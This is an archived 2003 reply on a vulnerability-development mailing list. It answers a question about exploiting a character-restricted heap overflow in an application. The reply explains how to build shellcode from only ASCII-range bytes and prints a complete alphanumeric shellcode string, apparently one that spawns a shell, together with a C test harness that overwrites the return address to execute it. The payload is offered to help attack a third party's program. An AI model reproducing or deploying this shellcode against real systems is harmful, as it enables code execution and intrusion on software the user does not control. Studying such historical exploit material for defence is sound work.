Vulnerability Development mailing list archives
Re: shellcode with standard characters
From: steve () uk intasys com
Date: Thu, 12 Jun 2003 23:48:29 +0100
On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:
This is my first post and I'm looking for some documentation. A friend of mine has produced a segfault with malloc vulnerability on an application.
We would like to produce something more interesting. The field overflowed can accept only characters between 0 and 128. Any other character is replaced with a whitespace. Can we inject shellcode with only this characters avaible? Can you suggest me documentation about shellcode writing?
The simplest thing to do is to write a simple program that will run a shell in C, and generate the assembly output for it with GCC -s, this will give you a starting point. After that you must filter out the opcodes and values which contain invalid characters. Using add's etc will save you some effort. Here's a simple sample: char shellcode[] = "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi" "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX" "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02" "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; return 0; } Steve -- Steve Kemp <steve () uk intasys com> Intasys Billing Technologies Ltd
Current thread:
- shellcode with standard characters JohnnyRun (Jun 12)
- Re: shellcode with standard characters andrewg (Jun 12)
- Re: shellcode with standard characters KF (Jun 12)
- Re: shellcode with standard characters sin (Jun 12)
- Re: shellcode with standard characters Jose Ronnick (Jun 12)
- Re: shellcode with standard characters steve (Jun 12)